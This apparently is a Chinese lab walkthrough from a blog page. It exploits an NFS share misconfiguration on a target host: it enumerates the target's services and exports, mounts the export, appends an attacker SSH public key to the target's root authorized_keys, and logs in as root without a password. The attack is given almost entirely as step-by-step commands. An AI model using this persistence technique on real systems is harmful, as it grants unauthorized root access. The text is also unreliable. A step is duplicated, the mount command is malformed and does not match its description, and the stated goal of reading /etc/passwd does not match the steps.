Linux NFS共享目录配置漏洞

目的:

利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容

原理:

NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。

准备:

  1. Kali系统版本2.0
  2. 主机IP:192.168.1.2   靶机IP:192.168.1.3

实战:

Step1:查看目标主机上NFS服务是否开启:

在终端输入rpcinfo -p 192.168.1.3

Step2:显示指定的远程共享目录列表:

在终端输入showmount -e 192.168.1.3

Step3:生成rsa公钥:

在终端输入ssh-keygen

Step4:在终端输入mkdir /tmp/tool,建立tool目录;在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下Step4:在终端输入mkdir /tmp/tool,建立tool目录;在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下

Step5:把生成的公钥追加到靶机的authorized_keys下,实现ssh免密码登录:

在终端输入cat  /root/.ssh/id_rsa.pub>>/tmp/tool/root/.ssh/authorized_keys

Step6:在终端输入ssh root@192.168.1.3

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值